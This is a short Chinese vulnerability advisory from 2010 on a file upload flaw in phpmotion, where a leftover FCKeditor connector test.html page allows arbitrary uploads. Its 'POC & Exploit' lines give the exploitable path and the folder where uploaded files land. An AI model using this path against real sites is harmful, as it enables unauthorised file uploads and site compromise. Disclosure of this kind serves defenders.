phpmotion/FCKeditor 上传漏洞
时间:2010-12-29 来源:anonymous
发布日期:2010-12.28
发布作者:anonymous
官方网站:http://www.phpmotion.com/
漏洞类型:文件上传
漏洞描述:phpmotion程序使用FCKeditor编辑器,未对test.html页面进行删除导致上传文件漏洞。
I. POC & Exploit
-----------------------------------------------------------------------
Default : http://127.0.0.1/
exploit : http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
results in : http://127.0.0.1/userfiles/name of file
标签分类:
相关阅读 更多 +
排行榜 更多 +